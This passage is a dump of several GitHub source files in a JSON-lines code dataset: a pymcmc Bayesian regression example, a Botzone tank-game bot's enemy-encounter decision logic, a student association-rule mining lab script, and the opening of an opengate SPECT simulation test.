os.path.join(os.path.dirname(pymcmc.__file__),'data')\n\ndef samplegamma(store):\n \"\"\"function that samples vector of indicators\"\"\"\n return store['SS'].sample_gamma(store)\n\ndata = loadtxt(os.path.join(datadir,'yld2.txt'))\nyvec = data[:, 0]\nxmat = data[:, 1:20]\nxmat = hstack([ones((xmat.shape[0], 1)), xmat])\n\n\"\"\"data is a dictionary whose elements are accessible from the functions\nin the MCMC sampler\"\"\"\ndata ={'yvec':yvec, 'xmat':xmat}\nprior = ['g_prior',zeros(xmat.shape[1]), 100.]\nSSVS = StochasticSearch(yvec, xmat, prior);\ndata['SS'] = SSVS\n\n\"\"\"initialise gamma\"\"\"\ninitgamma = zeros(xmat.shape[1], dtype ='i')\ninitgamma[0] = 1\nsimgam = CFsampler(samplegamma, initgamma, 'gamma', store ='all')\n\n\n# initialise class for MCMC samper\nrandom.seed(12346)\nms = MCMC(20000, 5000, data, [simgam])\nms.sampler()\nms.output()\nms.output(custom = SSVS.output)\n\ntxmat = SSVS.extract_regressors(0)\ng_prior = ['g_prior', 0.0, 100.]\nbreg = BayesRegression(yvec,txmat,prior = g_prior)\nbreg.output()\n\nbreg.plot()\n","repo_name":"rdenham/pymcmc","sub_path":"doc/example1_section3.1.py","file_name":"example1_section3.1.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"3"} +{"seq_id":"12779838256","text":"# -*- coding: utf-8 -*-\n# @Author: Administrator\n# @Date: 2019-05-15 18:05:23\n# @Last Modified by: Administrator\n# @Last Modified time: 2019-05-29 04:07:25\n\n__all__ = [\n\n \"EncountEnemyDecision\",\n\n ]\n\nfrom ..abstract import SingleDecisionMaker\nfrom ...utils import outer_label, debug_print\nfrom ...action import Action\nfrom ...field import BrickField\nfrom ...strategy.status import Status\nfrom ...strategy.label import Label\nfrom ...strategy.evaluate import evaluate_aggressive\nfrom .withdrawal import WithdrawalDecision\nfrom .base_defense import BaseDefenseDecision\n\n#{ BEGIN }#\n\nclass EncountEnemyDecision(SingleDecisionMaker):\n \"\"\"\n 遭遇敌人时的决策\n\n \"\"\"\n def _make_decision(self):\n\n player = self._player\n signal = self._signal\n map_ = player._map\n tank = player.tank\n battler = player.battler\n teammate = player.teammate\n\n Tank2Player = type(player)\n BattleTank = type(battler)\n\n aroundEnemies = battler.get_enemies_around()\n if len(aroundEnemies) > 0:\n player.set_status(Status.ENCOUNT_ENEMY)\n\n if len(aroundEnemies) > 1: # 两个敌人,尝试逃跑\n assert len(aroundEnemies) == 2 # 可能会遇到极其罕见的三人重叠\n\n # 首先判断是否为真正的双人夹击\n enemy1, enemy2 = aroundEnemies\n x, y = tank.xy\n x1, y1 = enemy1.xy\n x2, y2 = enemy2.xy\n\n # 先判断敌人是否重叠,如果是,那么很有可能直接击杀!\n if (x1, y1) == (x2, y2):\n if (not teammate.defeated # 队友还没有死,自己可以考虑牺牲\n and battler.canShoot\n ):\n player.set_status(Status.ENCOUNT_TWO_ENEMY)\n player.set_status(Status.READY_TO_DOUBLE_KILL_ENEMIES)\n player.set_status(Status.READY_TO_FIGHT_BACK)\n return battler.shoot_to(enemy1)\n\n if x1 == x2 == x:\n if (y > y1 and y > y2) or (y < y1 and y < y2):\n player.set_status(Status.ENCOUNT_ONE_ENEMY)\n pass # 实际可视为一个人\n elif y1 == y2 == y:\n if (x > x1 and x > x2) or (x < x1 and x < x2):\n player.set_status(Status.ENCOUNT_ONE_ENEMY)\n pass\n else: # 真正的被夹击\n player.set_status(Status.ENCOUNT_TWO_ENEMY)\n oppBattlers = [ BattleTank(_enemy) for _enemy in aroundEnemies ]\n if all( oppBattler.canShoot for oppBattler in oppBattlers ):\n # 如果两者都有弹药,可能要凉了 ...\n player.set_status(Status.DYING)\n if battler.canShoot:\n # TODO: 这种情况下有选择吗?\n player.set_status(Status.READY_TO_FIGHT_BACK)\n return battler.shoot_to(enemy1) # 随便打一个?\n elif all( not oppBattler.canShoot for oppBattler in oppBattlers ):\n # 均不能进攻的话,优先闪避到下回合没有敌人的位置(优先考虑拆家方向)\n firstMoveAction = tuple()\n attackAction = battler.get_next_attacking_action()\n if Action.is_move(attackAction): # 如果是移动行为\n firstMoveAction = ( attackAction, )\n for action in firstMoveAction + Action.MOVE_ACTIONS:\n if map_.is_valid_move_action(tank, action):\n with map_.simulate_one_action(tank, action):\n if len( battler.get_enemies_around() ) < 2: # 一个可行的闪避方向\n player.set_status(Status.READY_TO_DODGE)\n return action\n # 均不能闪避,应该是处在狭道内,则尝试任意攻击一个\n if battler.canShoot:\n # TODO: 是否有选择?\n player.set_status(Status.READY_TO_FIGHT_BACK)\n return battler.shoot_to(enemy1) # 随便打一个\n else: # 有一个能射击,则反击他\n for oppBattler in oppBattlers:\n if oppBattler.canShoot: # 找到能射击的敌人\n actions = battler.try_dodge(oppBattler)\n if len(actions) == 0: # 不能闪避\n if battler.canShoot:\n player.set_status(Status.READY_TO_FIGHT_BACK)\n return battler.shoot_to(oppBattler)\n else: # 要凉了 ...\n break\n elif len(actions) == 1:\n action = player.try_make_decision(actions[0])\n else:\n action = player.try_make_decision(actions[0],\n player.try_make_decision(actions[1]))\n if Action.is_move(action): # 统一判断\n player.set_status(Status.READY_TO_DODGE)\n return action\n # 没有办法?尝试反击\n if battler.canShoot:\n player.set_status(Status.READY_TO_FIGHT_BACK)\n return battler.shoot_to(oppBattler)\n else: # 要凉了\n break\n # 没有办法对付 ..\n player.set_status(Status.DYING)\n # 无所谓的办法了...\n return player.try_make_decision(battler.get_next_attacking_action())\n\n # TODO:\n # 虽然说遇到了两个一条线上的敌人,但是这不意味着后一个敌人就没有威胁 5ccee460a51e681f0e8e5b17\n\n\n # 当前情况:\n # ---------\n # 1. 敌人数量为 2 但是一个处在另一个身后,或者重叠,可视为一架\n # 2. 敌人数量为 1\n #\n if len(aroundEnemies) == 1:\n oppTank = aroundEnemies[0]\n else: # len(aroundEnemies) == 2:\n oppTank = battler.get_nearest_enemy()\n oppBattler = BattleTank(oppTank)\n oppPlayer = Tank2Player(oppBattler)\n\n #\n # (inserted) 判断上回合敌人是否和我重叠,用于标记敌人 5ce52a48d2337e01c7a714c7\n #\n if (player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=1)\n and not player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=2)\n and not Action.is_move(player.get_previous_action(back=1)) # 且不是因为我方主动打破重叠导致\n ): # 上回合刚刚进入重叠,这回合就被打破\n with map_.rollback_to_previous():\n if oppTank is battler.get_overlapping_enemy():\n oppPlayer.add_labels(Label.IMMEDIATELY_BREAK_OVERLAP_BY_MOVE)\n\n\n #\n # 在非 WITHDRAW 的情况下,评估当前侵略性\n #\n if not player.has_status(Status.WITHDRAW):\n _allowWithdraw = ( WithdrawalDecision.ALLOW_WITHDRAWAL\n and not player.has_label(Label.DONT_WITHDRAW) )\n status = evaluate_aggressive(battler, oppBattler, allow_withdraw=_allowWithdraw)\n player.set_status(status)\n else:\n status = Status.WITHDRAW\n\n # 侵略模式/僵持模式\n #----------\n # 1. 优先拆家\n # 2. 只在必要的时刻还击\n # 3. 闪避距离不宜远离拆家路线\n #\n if status == Status.AGGRESSIVE or status == Status.STALEMENT:\n if not oppBattler.canShoot:\n # 如果能直接打死,那当然是不能放弃的!!\n if len( oppBattler.try_dodge(battler) ) == 0: # 必死\n if battler.canShoot:\n player.set_status(Status.READY_TO_KILL_ENEMY)\n return battler.shoot_to(oppBattler)\n\n attackAction = battler.get_next_attacking_action() # 其他情况,优先进攻,不与其纠缠\n realAction = player.try_make_decision(attackAction) # 默认的进攻路线\n if Action.is_stay(realAction): # 存在风险\n if Action.is_move(attackAction):\n #\n # 原本移动或射击,因为安全风险而变成停留,这种情况可以尝试射击,充分利用回合数\n #\n # TODO:\n # 实际上,很多时候最佳路线选择从中线进攻,但从两侧进攻也是等距离的,\n # 在这种情况下,由于采用从中线的进攻路线,基地两侧的块并不落在线路上,因此会被\n # 忽略,本回合会被浪费。但是进攻基地两侧的块往往可以减短路线。因此此处值得进行\n # 特殊判断\n #\n fields = battler.get_destroyed_fields_if_shoot(attackAction)\n route = battler.get_shortest_attacking_route()\n for field in fields:\n if route.has_block(field): # 为 block 对象,该回合可以射击\n action = player.try_make_decision(battler.shoot_to(field))\n if Action.is_shoot(action):\n player.set_status(Status.PREVENT_BEING_KILLED)\n player.set_status(Status.KEEP_ON_MARCHING)\n return action\n # TODO: 此时开始判断是否为基地外墙,如果是,则射击\n for field in fields:\n if battler.check_is_outer_wall_of_enemy_base(field):\n action = player.try_make_decision(battler.shoot_to(field))\n if Action.is_shoot(action):\n player.set_status(Status.PREVENT_BEING_KILLED)\n player.set_status(Status.KEEP_ON_MARCHING)\n return action\n\n\n # 刚刚对射为两回合,该回合双方都没有炮弹,尝试打破僵局\n #---------------------------------------------------\n # 当前为侵略性的,并且在对方地盘,尝试回退一步,与对方重叠。\n # 后退操作必须要有限制 5cd10315a51e681f0e900fa8\n #\n # 如果一直回头,尝试在这一步选择非回头的其他行为 5ced8eee641dd10fdcc7907f\n #\n if (player.has_status_in_previous_turns(Status.OPPOSITE_SHOOTING_WITH_ENEMY, turns=3)\n and Action.is_stay(player.get_previous_action(back=2)) # 还需要检查两者上上回合是否为等待\n and Action.is_stay(oppPlayer.get_previous_action(back=2)) # 避免将边移动边对射的情况考虑进来\n and battler.is_in_enemy_site() # 添加必须在对方地盘的限制,避免在我方地盘放人\n and player.has_status(Status.AGGRESSIVE) # 只有侵略性的状态可以打破僵局\n ):\n # 判断是否为反复回头\n if player.has_status_recently(Status.READY_TO_BACK_AWAY, turns=6): # 最近几回合内是否曾经回头过\n player.add_labels(Label.ALWAYS_BACK_AWAY)\n\n if (player.has_label(Label.ALWAYS_BACK_AWAY)\n and not battler.is_in_our_site(include_midline=True) # 严格不在我方基地\n ): # 考虑用闪避的方式代替后退\n for action in battler.try_dodge(oppBattler):\n realAction = player.try_make_decision(action)\n if Action.is_move(realAction):\n player.set_status(Status.TRY_TO_BREAK_ALWAYS_BACK_AWAY)\n player.remove_labels(Label.ALWAYS_BACK_AWAY) # 删掉这个状态\n return realAction\n\n # 否则继续回头\n backMoveAction = battler.back_away_from(oppBattler)\n action = player.try_make_decision(backMoveAction)\n if Action.is_move(action):\n player.set_status(Status.READY_TO_BACK_AWAY)\n return action\n\n\n if (player.has_status_in_previous_turns(Status.OPPOSITE_SHOOTING_WITH_ENEMY, turns=1) # 上回合正在和对方对射\n and not battler.canShoot # 但是我方本回合不能射击\n and not oppBattler.canShoot # 并且对方本回合不能射击\n ):\n player.set_status(Status.OPPOSITE_SHOOTING_WITH_ENEMY) # 保持对射状态,用于后方打破僵持\n\n # 其余情况照常\n player.set_status(Status.PREVENT_BEING_KILLED)\n return realAction\n # 否则不予理会,直接移动或者反击\n action = player.try_make_decision(battler.get_next_attacking_action())\n if not Action.is_stay(action):\n # 补丁\n #----------------------------\n # 针对两者距离为 2 的情况,不能一概而论!\n #\n if status == Status.STALEMENT: # 僵持模式考虑堵路\n _route = battler.get_route_to_enemy_by_move(oppBattler)\n if _route.is_not_found():\n _route = battler.get_route_to_enemy_by_move(oppBattler, block_teammate=False)\n assert not _route.is_not_found(), \"route not found ?\" # 必定能找到路!\n assert _route.length > 0, \"unexpected overlapping enemy\"\n if _route.length == 2:\n if not player.is_suitable_to_overlap_with_enemy(oppBattler): # 更适合堵路\n player.set_status(Status.READY_TO_BLOCK_ROAD)\n return Action.STAY\n # 其他情况均可以正常移动\n #player.set_status(Status.KEEP_ON_MARCHING)\n #return action\n return # 直接抛出让后面的 decision 处理,当做没有这个敌人\n\n # 不能移动,只好反击\n action = player.try_make_decision(battler.shoot_to(oppBattler))\n if Action.is_shoot(action):\n player.set_status(Status.READY_TO_FIGHT_BACK)\n return action\n else:\n # 对方有炮弹,需要分情况 5ccb3ce1a51e681f0e8b4de1\n #-----------------------------\n # 1. 如果是侵略性的,则优先闪避,并且要尽量往和进攻路线方向一致的方向闪避,否则反击\n # 2. 如果是僵持的,那么优先堵路,类似于 Defensive\n #\n # TODO:\n # 可能需要团队信号协调 5ccc30f7a51e681f0e8c1668\n #\n if status == Status.STALEMENT:\n #\n # 首先把堵路的思路先做了,如果不能射击,那么同 aggressive\n #\n # TODO:\n # 有的时候这并不是堵路,而是在拖时间! 5ccf84eca51e681f0e8ede59\n\n # 上一回合保持重叠,但是却被敌人先过了,这种时候不宜僵持,应该直接走人\n # 这种情况下直接转为侵略模式!\n #\n if (player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=1)\n and (player.has_status_in_previous_turns(Status.READY_TO_BLOCK_ROAD, turns=1)\n or player.has_status_in_previous_turns(Status.KEEP_ON_OVERLAPPING, turns=1))\n ):\n pass # 直接过到侵略模式\n else:\n # 否则算作正常的防守\n #\n # TODO:\n # 射击不一定正确,因为敌人可能上回合刚把我过掉,此时应该考虑主动闪走!\n # 5ce4e66cd2337e01c7a6abd7\n #\n if battler.canShoot:\n\n #\n # (inserted) 先看上回合是不是刚被对方过掉\n #\n _justBreakOverlap = False\n with map_.rollback_to_previous():\n if (battler.has_overlapping_enemy()\n and oppTank is battler.get_overlapping_enemy()\n ): # 刚刚被对手打破重叠\n _justBreakOverlap = True\n\n _shouldShoot = False\n if _justBreakOverlap: # 刚刚被对手主动打破重叠\n for _route in battler.get_all_shortest_attacking_routes():\n if oppTank.xy in _route: # 对方现在位于我的攻击路线上,说明对方上回合是\n _shouldShoot = True # 回头堵路,那么继续保持射击\n break\n\n if _shouldShoot: # 正常防御\n player.set_status(Status.READY_TO_BLOCK_ROAD, Status.READY_TO_FIGHT_BACK)\n if battler.on_the_same_line_with(oppBattler, ignore_brick=False):\n player.set_status(Status.OPPOSITE_SHOOTING_WITH_ENEMY) # 保持对射\n return battler.shoot_to(oppBattler)\n else:\n pass # 否则视为进攻逻辑\n\n # 闪避,尝试找最佳方案\n #-------------------------\n defenseAction = Action.STAY\n if battler.canShoot:\n defenseAction = battler.shoot_to(oppBattler)\n\n\n dodgeActions = battler.try_dodge(oppTank)\n\n if battler.is_in_enemy_site(): # 限制条件,只有在对方基地才开始闪现!\n\n #\n # 最佳方向是闪避向着进攻方向移动\n #\n attackAction = battler.get_next_attacking_action()\n for action in dodgeActions: # 与进攻方向相同的方向是最好的\n if Action.is_same_direction(action, attackAction):\n realAction = player.try_make_decision(action) # 风险评估\n if Action.is_move(realAction):\n player.set_status(Status.KEEP_ON_MARCHING, Status.READY_TO_DODGE)\n return realAction # 闪避加行军\n\n\n # 没有最佳的闪避方案,仍然尝试闪避\n #-----------------------------\n # 但是不能向着增加攻击线路长短的方向闪避!\n #\n route1 = battler.get_shortest_attacking_route()\n for action in dodgeActions:\n realAction = player.try_make_decision(action)\n if Action.is_move(realAction):\n with map_.simulate_one_action(battler, action):\n route2 = battler.get_shortest_attacking_route()\n if route2.length > route1.length: # 不能超过当前路线长度,否则就是浪费一回合\n continue\n else:\n player.set_status(Status.KEEP_ON_MARCHING, Status.READY_TO_DODGE)\n return realAction\n\n #\n # 此时还可以考虑借力\n # 假设下回合两方对射,如果我方尝试闪避,对方会恰好打掉我方进攻路线上的块,那么就闪避\n #\n if (len(dodgeActions) > 0 # 存在可用的闪避行为\n and battler.is_in_enemy_site() # 限制为只有在对方基地才适用这个逻辑\n ):\n _shouldDodge = False\n action = dodgeActions[0]\n enemyShootAction = oppBattler.shoot_to(battler)\n with outer_label() as OUTER_BREAK:\n with map_.simulate_one_action(battler, action): # 假设闪走\n fields = oppBattler.get_destroyed_fields_if_shoot(enemyShootAction)\n for field in fields:\n if isinstance(field, BrickField): # 对手会打掉墙\n for _route in battler.get_all_shortest_attacking_routes():\n if field.xy in _route: # 这个块在某一个最短的攻击路线上\n _shouldDodge = True\n raise OUTER_BREAK\n if _shouldDodge:\n for action in dodgeActions:\n realAction = player.try_make_decision(action)\n if Action.is_move(realAction):\n player.set_status(Status.KEEP_ON_MARCHING, Status.READY_TO_DODGE)\n return realAction\n\n #\n # 没有不能不导致路线变长的办法,如果有炮弹,那么优先射击!\n # 5ccef443a51e681f0e8e64d8\n #-----------------------------------\n route1 = battler.get_shortest_attacking_route()\n if Action.is_shoot(defenseAction):\n player.set_status(Status.READY_TO_FIGHT_BACK)\n if battler.on_the_same_line_with(oppBattler, ignore_brick=False):\n\n # (inserted) 刚刚对射为两回合,该回合尝试闪避敌人,打破僵局\n #--------------------------------------------\n # 尝试往远处闪避,创造机会\n #\n # 此外,由于敌人这回合必定射击,那么他的炮弹可能会打掉我身后的墙\n # 这样的可能会创造一些新的机会。有的时候导致该回合必须要与敌人对射的原因,可能是因为\n # 没有办法开辟攻击路线,而不是敌人堵路。由于闪避的方向是不允许的,也就是另一个更近的\n # 闪避反向上必定是一个无法摧毁也不能移动到的块,否则会被与先摧毁。\n # 此时如果可以往背离敌人的方向移动,那么应该不会陷入对射僵局。但事实上是进入了\n # 这就说明别离敌人的方向是无法移动到的。如果它恰好是一块土墙,那么就可以靠这回合和敌人接力\n # 来摧毁掉,也许还有往下移动的可能。 5ce429fad2337e01c7a5cd61\n #\n if (player.has_status_in_previous_turns(Status.OPPOSITE_SHOOTING_WITH_ENEMY, turns=4)\n and Action.is_stay(player.get_previous_action(back=1)) # 检查对应的两个冷却回合是停止\n and Action.is_stay(player.get_previous_action(back=3)) # 避免将移动对射的情况被考虑进来\n and Action.is_stay(oppPlayer.get_previous_action(back=1))\n and Action.is_stay(oppPlayer.get_previous_action(back=3))\n and battler.is_in_enemy_site() # 添加必须在对方地盘的限制,避免在我方地盘放人\n and player.has_status(Status.AGGRESSIVE) # 只有侵略性的状态可以打破僵局\n ):\n for action in battler.try_dodge(oppBattler):\n if Action.is_move(action):\n realAction = player.try_make_decision(action)\n if Action.is_move(realAction):\n player.set_status(Status.READY_TO_DODGE)\n # 这里还是再判断一下距离\n route1 = battler.get_shortest_attacking_route()\n with map_.simulate_one_action(battler, action):\n route2 = battler.get_shortest_attacking_route()\n if route2.length > route1.length:\n player.set_status(Status.WILL_DODGE_TO_LONG_WAY)\n return realAction\n\n # 默认是优先射击\n player.set_status(Status.OPPOSITE_SHOOTING_WITH_ENEMY)\n return defenseAction\n\n\n # 如果不能射击,那么终究还是要闪避的\n # 或者是无法后方移动,为了打破僵局,尝试闪避\n #----------------------------------\n for action in dodgeActions:\n realAction = player.try_make_decision(action)\n if Action.is_move(realAction):\n player.set_status(Status.KEEP_ON_MARCHING, Status.READY_TO_DODGE)\n #\n # 因为这种情况很有可能会出现死循环 5cd009e0a51e681f0e8f3ffb\n # 为了后续能够打破这种情况,这里额外添加一个状态进行标记\n #\n player.set_status(Status.WILL_DODGE_TO_LONG_WAY)\n return realAction\n\n if Action.is_stay(defenseAction):\n #\n # 其实还有一种情况,那就是危险的敌人在自己身上! 5ceaaacdd2337e01c7adf6a4\n #\n riskyEnemyBattler = player.get_risky_enemy()\n if (riskyEnemyBattler is not None\n and riskyEnemyBattler is not oppBattler\n and riskyEnemyBattler.xy == battler.xy\n ): # 这种情况下实际是没有威胁的 ...\n for action in dodgeActions:\n player.set_status(Status.KEEP_ON_MARCHING, Status.READY_TO_DODGE)\n # TODO:\n # 还需要判断是否向远路闪避 ...\n # 这里的细节还需要优化,或者这个和自己重叠的条件在前面就要穿插进去\n return action\n\n player.set_status(Status.DYING) # 否则就凉了 ...\n\n return defenseAction\n\n return Action.STAY\n\n\n # 防御模式\n #----------\n # 1. 如果对方下回合必死,那么射击\n # 2. 优先堵路,距离远则尝试逼近\n # 3. 必要的时候对抗\n # 4. 距离远仍然优先\n #\n # elif status == DEFENSIVE_STATUS:\n # attackAction = self.try_make_decision(battler.get_next_attacking_action()) # 默认的侵略行为\n elif status == Status.DEFENSIVE:\n if not oppBattler.canShoot:\n\n if len( oppBattler.try_dodge(battler) ) == 0:\n if battler.canShoot: # 必死情况\n player.set_status(Status.READY_TO_KILL_ENEMY)\n return battler.shoot_to(oppBattler)\n #\n # 不能马上打死,敌人又无法攻击\n #-------------------------------\n # 优先堵路,根据双方距离判断\n #\n _route = battler.get_route_to_enemy_by_move(oppBattler)\n if _route.is_not_found():\n _route = battler.get_route_to_enemy_by_move(oppBattler, block_teammate=False)\n assert not _route.is_not_found(), \"route not found ?\" # 必定能找到路!\n assert _route.length > 0, \"unexpected overlapping enemy\"\n\n if _route.length == 1: # 双方相邻,选择等待\n\n # 此处首先延续一下对射状态\n if (player.has_status_in_previous_turns(Status.OPPOSITE_SHOOTING_WITH_ENEMY, turns=1) # 上回合正在和对方对射\n and not battler.canShoot # 但是我方本回合不能射击\n and not oppBattler.canShoot # 并且对方本回合不能射击\n ):\n player.set_status(Status.OPPOSITE_SHOOTING_WITH_ENEMY) # 保持对射状态,用于后方打破僵持\n\n player.set_status(Status.READY_TO_BLOCK_ROAD)\n return Action.STAY\n elif _route.length > 2: # 和对方相隔两个格子以上\n if player.is_safe_to_close_to_this_enemy(oppBattler): # 可以安全逼近\n action = battler.move_to(oppBattler)\n player.set_status(Status.READY_TO_BLOCK_ROAD) # 可以认为在堵路 ...\n return action\n else:\n player.set_status(Status.READY_TO_BLOCK_ROAD)\n return Action.STAY # 否则只好等额爱\n else: # _route.length == 2:\n # 相距一个格子,可以前进也可以等待,均有风险\n #----------------------------------------\n # 1. 如果对方当前回合无法闪避,下一回合最多只能接近我\n # - 如果对方下回合可以闪避,那么我现在等待是意义不大的,不如直接冲上去和他重叠\n # - 如果对方下回合仍然不可以闪避,那么我就选择等待,反正它也走不了\n # 2. 如果对方当前回合可以闪避,那么默认冲上去和他重叠\n # - 如果我方可以射击,那么对方应该会判定为闪避,向两旁走,那么我方就是在和他逼近\n # - 如果我方不能射击,对方可能会选择继续进攻,如果对方上前和我重叠,就可以拖延时间\n #\n # TODO:\n # 好吧,这里的想法似乎都不是很好 ...\n # 能不防御就不防御,真理 ...\n #\n \"\"\"if len( oppBattler.try_dodge(battler) ) == 0:\n # 对手当前回合不可闪避,当然我方现在也不能射击。现在假设他下一步移向我\n action = oppBattler.move_to(battler) # 对方移向我\n if map_.is_valid_move_action(oppBattler, action):\n map_.simulate_one_action(oppBattler, action) # 提交模拟\n if len( oppBattler.try_dodge(battler) ) == 0:\n # 下回合仍然不可以闪避,说明可以堵路\n map_.revert()\n player.set_status(Status.READY_TO_BLOCK_ROAD)\n return Action.STAY\n map_.revert()\n # 否则直接冲上去\n if player.is_safe_to_close_to_this_enemy(oppBattler): # 可以安全移动\n moveAction = battler.move_to(oppBattler)\n player.set_status(Status.READY_TO_BLOCK_ROAD) # 可以认为在堵路\n return moveAction\n else: # 冲上去不安全,那就只能等到了\n player.set_status(Status.READY_TO_BLOCK_ROAD)\n return Action.STAY\n else:\n # 对手当前回合可以闪避,那么尝试冲上去和他重叠\n # TODO:\n # 可能弄巧成拙 5cca97a4a51e681f0e8ad227\n #\n # 这个问题需要再根据情况具体判断!\n #\n '''\n if player.is_safe_to_close_to_this_enemy(oppBattler): # 可以安全重叠\n moveAction = battler.move_to(oppBattler)\n player.set_status(Status.READY_TO_BLOCK_ROAD)\n return moveAction\n else: # 有风险,考虑等待\n player.set_status(Status.READY_TO_BLOCK_ROAD)\n return Action.STAY\n '''\n #\n # TODO:\n # 是否应该根据战场情况进行判断,比如停下来堵路对方一定无法走通?\n #\n # 假设自己为钢墙然后搜索对方路径?\n #\n player.set_status(Status.READY_TO_BLOCK_ROAD)\n return Action.STAY\"\"\"\n player.set_status(Status.READY_TO_BLOCK_ROAD)\n return Action.STAY # 似乎没有比这个这个更好的策略 ...\n # 对方可以射击\n else:\n if battler.canShoot: # 优先反击\n player.set_status(Status.READY_TO_FIGHT_BACK)\n if battler.on_the_same_line_with(oppBattler, ignore_brick=False):\n player.set_status(Status.OPPOSITE_SHOOTING_WITH_ENEMY) # 触发对射状态\n return battler.shoot_to(oppBattler)\n # 不能反击,只好闪避\n actions = battler.try_dodge(oppBattler)\n if len(actions) == 0:\n player.set_status(Status.DYING) # 凉了 ...\n action = Action.STAY\n elif len(actions) == 1:\n action = player.try_make_decision(actions[0])\n else: # len(actions) == 2:\n action = player.try_make_decision(actions[0],\n player.try_make_decision(actions[1]))\n if Action.is_move(action): # 统一判断\n player.set_status(Status.READY_TO_DODGE)\n return action\n # 否则就凉了 ...\n player.set_status(Status.DYING)\n\n return Action.STAY\n\n #\n # 回撤模式\n #------------\n # 1. 优先回撤\n # 2. 如果处在守卫状况,根据所处位置,选择反击或堵路\n #\n elif status == Status.WITHDRAW:\n base = map_.bases[battler.side]\n if not battler.is_closest_to(base):\n with player.create_snapshot():\n decision = WithdrawalDecision(player, signal)\n action = decision.make_decision()\n if decision.is_handled(action):\n with map_.simulate_one_action(battler, action):\n if oppTank not in battler.get_enemies_around(): # 安全行为\n return # 留给 withdraw 处理\n else:\n # 现在我方坦克已经处在基地附近\n with player.create_snapshot():\n decision = BaseDefenseDecision(player, signal)\n action = decision.make_decision()\n if decision.is_handled(action): # 符合 base defense 的条件\n with map_.simulate_one_action(battler, action):\n if oppTank not in battler.get_enemies_around(): # 安全行为\n return # 留给 base defense\n #\n # 否则就是不安全行为,应该予以反击\n #\n if battler.canShoot:\n player.set_status(Status.READY_TO_FIGHT_BACK)\n return battler.shoot_to(oppBattler)\n elif oppBattler.canShoot: # 否则应该闪避\n for action in battler.try_dodge(oppBattler):\n player.set_status(Status.READY_TO_DODGE)\n return action\n\n if oppBattler.canShoot:\n player.set_status(Status.DYING) # 不然就凉了 ...\n\n # 最后就等待\n return Action.STAY\n\n\n#{ END }#","repo_name":"zhongxinghong/Botzone-Tank2","sub_path":"core/decision/single/encount_enemy.py","file_name":"encount_enemy.py","file_ext":"py","file_size_in_byte":40160,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"3"} +{"seq_id":"3914069002","text":"import csv \nfrom mlxtend.frequent_patterns import fpgrowth, association_rules\nfrom timeit import timeit\nimport pandas as pd\n\ndef f_presence_matrix(invoices, all_items):\n position_dictionary = { k:v for v,k in enumerate(all_items)}\n presence_matrix = []\n n_items = len(all_items)\n for invoice in invoices.values():\n row = [False] * n_items\n for item in invoice:\n row[position_dictionary[item]] = True\n presence_matrix.append(row)\n return presence_matrix\n \n\n#2.1.1\ndata = []\nwith open('online_retail.csv') as or_file:\n for row in csv.reader(or_file):\n if not row[0].startswith('C'):\n data.append(row)\nheader = data.pop(0)\n\n#2.1.2\ninvoices = {}\nfor row in data:\n if row[0] not in invoices:\n invoices[row[0]] = set()\n invoices[row[0]].add(row[2])\n\n#2.1.3\nall_items_set = set()\nfor items in invoices.values():\n all_items_set.update(items)\nall_items = sorted(list(all_items_set))\npresence_matrix = f_presence_matrix(invoices, all_items)\ndf = pd.DataFrame(data=presence_matrix, columns=all_items)\n\n#2.1.4/5\nfreq_itemsets = fpgrowth(df, 0.02) \nprint((len(freq_itemsets))) #303\nprint(freq_itemsets[freq_itemsets[\"itemsets\"].map(len)>1])\n\n#2.1.6\nM = df.values\nsupport_2656 = len(M[M[:, 2656]]==True)/len(M)\nsupport_1599 = len(M[M[:, 1599]]==True)/len(M)\nsupport_tot = len(M[(M[:, 2656] == True) & (M[:, 1599] == True)])/len(M)\nprint(f\"Confidence 2656 => 1599: {support_tot / support_2656}\")\nprint(f\"Confidence 1599 => 2656: {support_tot / support_1599}\")\n\n#2.1.7\nfreq_itemsets = fpgrowth(df, 0.01) \nassociation_rules(freq_itemsets, 'confidence', 0.85)","repo_name":"alessandroturrin/Data-Science-Lab","sub_path":"Lab03/ass_rules.py","file_name":"ass_rules.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11638334062","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport itk\nimport numpy as np\n\nimport opengate as gate\nimport opengate.contrib.spect.genm670 as gate_spect\nfrom opengate.userhooks import check_production_cuts\nfrom opengate.tests import utility\n\n\ndef create_spect_simu(sim, paths, number_of_threads=1):\n # main options\n sim.g4_verbose = False\n sim.visu = False\n sim.number_of_threads = number_of_threads\n sim.random_seed = 123456\n\n # units\n m = gate.g4_units.m\n cm = gate.g4_units.cm\n keV = gate.g4_units.keV\n mm = gate.g4_units.mm\n Bq = gate.g4_units.Bq\n kBq = 1000 * Bq\n\n # world size\n sim.world.size = [1 * m, 1 * m, 1 * m]\n sim.world.material = \"G4_AIR\"\n\n # spect head (debug mode = very small collimator)\n spect, crystal = gate_spect.add_ge_nm67_spect_head(\n sim, \"spect\", collimator_type=False, debug=False\n )\n psd = 6.11 * cm\n spect.translation = [0, 0, -(20 * cm + psd)]\n\n # waterbox\n waterbox = sim.add_volume(\"Box\", \"waterbox\")\n waterbox.size = [15 * cm, 15 * cm, 15 * cm]\n waterbox.material = \"G4_WATER\"\n blue = [0, 1, 1, 1]\n waterbox.color = blue\n\n # physic list\n sim.physics_manager.physics_list_name = \"G4EmStandardPhysics_option4\"\n sim.physics_manager.enable_decay = False\n\n sim.physics_manager.global_production_cuts.gamma = 10 * mm\n sim.physics_manager.global_production_cuts.electron = 10 * mm\n sim.physics_manager.global_production_cuts.positron = 10 * mm\n sim.physics_manager.global_production_cuts.proton = 10 * mm\n\n sim.physics_manager.set_production_cut(\n volume_name=\"spect\",\n particle_name=\"gamma\",\n value=0.1 * mm,\n )\n sim.physics_manager.set_production_cut(\n volume_name=\"spect\",\n particle_name=\"electron\",\n value=0.01 * mm,\n )\n sim.physics_manager.set_production_cut(\n volume_name=\"spect\",\n particle_name=\"positron\",\n value=0.1 * mm,\n )\n\n # default source for tests\n activity = 30 * kBq\n beam1 = sim.add_source(\"GenericSource\", \"beam1\")\n beam1.mother = 